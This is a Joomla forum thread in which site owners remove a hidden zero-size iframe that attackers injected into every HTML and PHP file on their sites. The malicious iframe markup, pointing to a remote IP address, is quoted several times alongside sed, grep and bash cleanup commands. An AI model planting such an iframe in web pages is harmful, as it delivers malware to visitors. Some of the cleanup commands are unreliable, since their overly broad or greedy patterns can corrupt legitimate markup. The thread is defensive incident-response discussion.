The Joomla! Forum ™



PostPosted: Wed Feb 04, 2009 10:23 pm 
Joomla! Apprentice

Joined: Fri Apr 20, 2007 4:51 pm
Posts: 22
These guys are so annoying.

So here's my site:
http://www.mymechanics.co.uk/

Before you click on it! There is a worm embedded in an iframe on the site.

It occurs in two places, here:
Code:
<body>
<div class="topbar">
<div id="navcontainer">
<iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><ul id="mainlevel-nav"><li><a href="http://www.mymechanics.co.uk/" class="mainlevel-nav" id="active_menu-nav">Home</a></li><li><a href="http://www.mymechanics.co.uk/Garages/" class="mainlevel-nav" >Browse Garages</a></li><li><a href="http://www.mymechanics.co.uk/Car-Advice/home" class="mainlevel-nav" >Car Advice</a></li><li><a href="http://www.mymechanics.co.uk/component/option,com_ja_submit/Itemid,14/" class="mainlevel-nav" >Add Garage</a></li><li><a href="http://www.mymechanics.co.uk/component/option,com_ja_submit/Itemid,28/" class="mainlevel-nav" >Add Car Advice</a></li><li><a href="http://www.mymechanics.co.uk/Forum/home" class="mainlevel-nav" >Forum</a></li></ul><div id="header">
<h1><a href="#">HEADER</a></h1>
<h2>MyMechanics.co.uk</h2>
<h3>Your Local Garage Uncovered</h3>


Note that it occurs just before my first module is loaded (which is mod_mainmenu). Here is the section in my template index.php:

Code:
<body>
<div class="topbar">
<div id="navcontainer">
<?php mosLoadModules ( 'top',-1 ); ?>
<div id="header">
<h1><a href="#">HEADER</a></h1>
<h2>MyMechanics.co.uk</h2>
<h3>Your Local Garage Uncovered</h3>


I have a couple of other modules loading.

Then it occurs immediately in my content pane:
Code:
<div class="right_banner"></div>
   
      <table class="contentpaneopen">
            <tr>
         <td valign="top" colspan="2">
            <div align="left"><iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>      <div class="moduletable-si">
            <table class="siteinfo">


The div -si is another module called mod_siteinfo. Here it is in my index.php:

Code:
<div class="right_banner"><?php mosLoadModules('banner',-1);?></div>
<?php mosMainBody(); ?>
<?php if (mosCountModules('user1') || mosCountModules('user2')) { ?>


I've checked both the modules and there is no sign of it in here.

Where on earth is this code being put!? Could it be in the mosloadmodule call? Where is that?

Sorry, any help would be great.

Thanks,

Olly


Last edited by nutts4life on Thu Feb 05, 2009 7:40 pm, edited 1 time in total.

 
 Post subject: Re: Help ME!
PostPosted: Wed Feb 04, 2009 10:45 pm 
Joomla! Apprentice

Joined: Fri Apr 20, 2007 4:51 pm
Posts: 22
Ok,

I've found out what these monkeys have done.

Every single one of the index.html's have got this code in them.

As you all know there's about 100 - 150 of these.

And I have 5 sites, that all have the same problem.

I need some ideas on how I'm going to get rid of these iframes.

Any ideas?

Thanks,

Olly


 
PostPosted: Thu Feb 05, 2009 7:43 pm 
Joomla! Apprentice

Joined: Fri Apr 20, 2007 4:51 pm
Posts: 22
OK, here's how I did it. I hope this is useful for someone one day.

The hacker had searched and replaced ALL the php / html and htm files in my hosting area.

They had added the iframe html above.

So I logged into my hosting server using PuTTY and ran the following commands from the root directory:
Code:
find -name "*.htm*" -exec sed -i 's/<iframe src="http:\/\/124.217.252.62\/~admin\/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' {} \;

AND
Code:
find -name "*.php" -exec sed -i 's/<iframe src="http:\/\/124.217.252.62\/~admin\/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' {} \;


This got rid of them.

Good luck and let's beat these guys.

n4l


 
PostPosted: Thu Feb 05, 2009 7:48 pm 
Joomla! Master

Joined: Thu Aug 18, 2005 7:13 am
Posts: 16285
Have you also found the way they came into your site? If not, it's going to be child's play to do it again.

_________________
Joomla forum global moderator.

Take care


 
PostPosted: Sat Feb 07, 2009 1:52 pm 
Joomla! Apprentice

Joined: Fri Apr 20, 2007 4:51 pm
Posts: 22
Toni,

Thanks for the concern, I did find the way. I was using an include on one of my other sites and reading the parameters of the include from the URL!

How dumb was that. Anyway, I fixed it all. If it happens again, I will contact here.

Thanks,

n4l
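
A first-pass way to look for the kind of include described in the post above, as an added example that is not part of the original thread. The file names, the sample PHP and the `audit_includes` function are constructed for illustration, and GNU grep is assumed.

```bash
#!/bin/bash
# Added example (not from the thread): first-pass audit for PHP include/require
# statements whose argument is built from request data on the same line.
# It will not follow a value through an intermediate variable.
INCLUDE_RE='(include|require)(_once)?[[:space:]]*\(?[^;]*\$_(GET|POST|REQUEST|COOKIE)'

audit_includes() {
    grep -rnE --include='*.php' -e "$INCLUDE_RE" "$1"
}

# Constructed sample files: the pattern to find, and an allow-listed form.
src=$(mktemp -d)
cat > "$src/old.php" <<'EOF'
<?php
// path taken straight from the URL
include($_GET['page'] . '.php');
EOF
cat > "$src/fixed.php" <<'EOF'
<?php
// the URL only selects a key; paths come from a fixed table
$pages = array('home' => 'home.php', 'advice' => 'advice.php');
$key = isset($_GET['page']) ? $_GET['page'] : 'home';
include isset($pages[$key]) ? $pages[$key] : $pages['home'];
EOF

findings=$(audit_includes "$src")
echo "$findings"
```

Only `old.php` is reported; every hit should be read by hand before deciding how to replace it with a fixed lookup table like the one in `fixed.php`.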


 
PostPosted: Mon Jun 22, 2009 7:42 pm 
Joomla! Enthusiast

Joined: Wed Sep 24, 2008 6:06 pm
Posts: 191
Location: Bangalore
I just modified the above script and used the following...
find -name "*.htm*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.php*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.js*" -exec sed -i 's/<iframe src=//' {} \;
find -name "*.html*" -exec sed -i 's/<iframe src=//' {} \;

but no output..
Is the command line correct?

_________________
cmsGalaxy Team, Web Developer, Bangalore, India
Website Design - Development - SEO - Joomla
www.cmsGalaxy.com


 
PostPosted: Sun Oct 25, 2009 9:29 am 
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11629
Location: The Girly Side of Joomla in Sussex
cagsan wrote:
And change the chmod of the files that infected from 777 to 666.

no - delete the infected files and replace with proper clean files and then make sure your site is secure

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


 
PostPosted: Sun Dec 06, 2009 1:11 am 
Joomla! Apprentice

Joined: Mon Aug 24, 2009 11:23 am
Posts: 28
Hi guys,

I am in the same situation as above.

I don't have putty access to my host.
So now I have to restore files from recent backups.

My concern is although I know how to get rid of this iframe crap, I would like to know from you guys what directory permissions should I use after joomla installations.


Regards,


 
PostPosted: Sun Dec 06, 2009 1:41 am 
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11629
Location: The Girly Side of Joomla in Sussex
ifanatic wrote:
Hi guys

My concern is although I know how to get rid of this iframe crap, I would like to know from you guys what directory permissions should I use after joomla installations.
Regards,

http://docs.joomla.org/Security_Checklist_7

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


 
PostPosted: Wed Dec 16, 2009 5:53 pm 
Joomla! Apprentice

Joined: Wed May 06, 2009 10:38 am
Posts: 49
If you have your entire website downloaded on your PC (backup) you could use grepWin.

If you find the string that needs to be removed you can create a regex string to find and remove all of them.

Place a \ in front of all special characters: ( ) { } / as this uses grep's regex which is different from others.

So the line found in the first website:

Code:
<iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


Would be found with:

Code:
<iframe src\s*=\s*['|"]http:\/\/.*width\s*=\s*0 height\s*=\s*0 style\s*=\s*['|"]hidden['|"] frameborder\s*=\s*0 marginheight\s*=\s*0 marginwidth\s*=\s*0 scrolling\s*=\s*no><\/iframe>


The "\s*" before and after each "=" means that there might be a space or tab before and after the "=". You need to account for that. The ['|"] is a character class that will match either a single quote or double quote - you need to account for that as well.

The regex I show above will catch any iframe with those parameters regardless of whether or not the iframe uses an IP address or any domain - so be careful with it. The section: http:\/\/.* means: http:// all characters up to width. The dot is all characters and the * is zero or many times.

When using grepWin, I usually tell it to search first, then I'll go ahead and let it do a search and replace. Replace with a blank will remove it all.

If you have problems using grepWin let me know and I'll help you create a string.
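
A search-first, then replace workflow like the one in this post, done on a server shell with a bounded pattern instead of `.*`, as an added example that is not part of the original thread. The sample tree, the `192.0.2.10` address and the function names are constructed for illustration; GNU grep and sed are assumed.

```bash
#!/bin/bash
# Added example (not from the thread). Audit first, then remove, hidden
# zero-size iframes. [^>]* cannot cross the end of the opening tag, so a match
# never swallows markup between two iframes on one line; the [[:space:]] before
# width/height keeps marginwidth= and marginheight= from being counted.
IFRAME_RE="<iframe[^>]*[[:space:]]width[[:space:]]*=[[:space:]]*[\"']?0[^>]*[[:space:]]height[[:space:]]*=[[:space:]]*[\"']?0[^>]*>[[:space:]]*</iframe>"
INCLUDES=(--include='*.php' --include='*.htm*' --include='*.js')

# Print file:line:matched-element for every hit; changes nothing.
scan_iframes() {
    grep -rnoiE "${INCLUDES[@]}" -e "$IFRAME_RE" "$1"
}

# Copy each affected file into a backup directory (keep it outside the web
# root), then delete only the matched elements.
clean_iframes() {
    local root=$1 backup=$2 f
    grep -rlZiE "${INCLUDES[@]}" -e "$IFRAME_RE" "$root" |
    while IFS= read -r -d '' f; do
        mkdir -p "$backup/$(dirname "$f")"
        cp -p "$f" "$backup/$f"
        sed -E -i "s#$IFRAME_RE##gI" "$f"
        echo "cleaned $f"
    done
}

# Constructed sample tree; 192.0.2.10 is a documentation address.
demo=$(mktemp -d)
mkdir -p "$demo/site/templates"
bad='<iframe src="http://192.0.2.10/c.php?o=2" width=0 height=0 style="hidden" frameborder=0></iframe>'
good='<iframe src="/map.html" width="400" height="300" marginwidth="0" marginheight="0"></iframe>'
printf '<div>%s<ul><li>Home</li></ul>%s</div>\n' "$bad" "$good" > "$demo/site/index.php"
printf '<p>no frames here</p>\n%s\n' "$bad" > "$demo/site/templates/index.html"

hits=$(scan_iframes "$demo/site")   # review this list before cleaning
echo "$hits"
clean_iframes "$demo/site" "$demo/backup"
```

The visible 400x300 iframe and the menu markup on the same line survive the cleanup, and the untouched originals remain in the backup directory for comparison.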


 
PostPosted: Wed Feb 17, 2010 11:39 am 
Joomla! Enthusiast

Joined: Wed Sep 24, 2008 6:06 pm
Posts: 191
Location: Bangalore
Dreamweaver is the tool which is best for this. You can remove IFRAME code from all the files in a click using Dreamweaver.

_________________
cmsGalaxy Team, Web Developer, Bangalore, India
Website Design - Development - SEO - Joomla
www.cmsGalaxy.com


 
PostPosted: Wed Feb 17, 2010 10:43 pm 
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11629
Location: The Girly Side of Joomla in Sussex
Dreamweaver may be the tool for you, but how did the code get there in the first place?

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


 
PostPosted: Thu Apr 29, 2010 12:23 pm 
Joomla! Fledgling

Joined: Fri Jan 22, 2010 6:30 pm
Posts: 3
rajeshatbuzz wrote:
Dreamweaver is the tool which is best for this. You can remove IFRAME code from all the files in a click using Dreamweaver.


Please can you explain a little more how I could delete my iframe from Dreamweaver?

Any script or tool to clean those fu... iframes?

I can't believe in this day and I can't find an antivirus to clean my site from my FTP?
Can you suggest any tool to clean my site online?

I repeat, I can't download all the files again.. and upload.. all so many files... :(


 
PostPosted: Thu Apr 29, 2010 12:40 pm 
Joomla! Apprentice

Joined: Wed May 06, 2009 10:38 am
Posts: 49
You'll have to download all the files to your local PC. Otherwise, you won't have the tools to do what you want to do.

Then I'd suggest using grepWin.


 
PostPosted: Thu May 06, 2010 2:34 pm 
Joomla! Fledgling

Joined: Fri Jan 22, 2010 6:30 pm
Posts: 3
I can't download all the files to my PC...

Any chance to delete iframes using phpMyAdmin? How?

Thanks :D
Please, I need a solution online :(


 
PostPosted: Mon Dec 10, 2012 1:40 pm 
Joomla! Fledgling

Joined: Mon Dec 10, 2012 1:16 pm
Posts: 2
You can modify and run the following script in the root dir of your Joomla site.
It will clean all the files with the iframe infection, typically with one line appended to all .js files.
Feel free to replace the search string with a different regexp that handles your infection.
This will cycle through every file and replace the searched string with a space.
=================
#!/bin/bash
# List files containing the injected document.write(<iframe ...>) line,
# NUL-delimited so paths with spaces survive, then blank the match in place.
grep -rlZ 'document.write..<iframe src="http://.*<.iframe>..' . |
while IFS= read -r -d '' fl; do
    sed -i 's/document.write(.<iframe src="http:\/\/.*<\/iframe>.)/ /g' "$fl"
    echo "Fixed $fl"
done
=================
Take care of permissions after the cleanup to stop future infections.

cheers
J

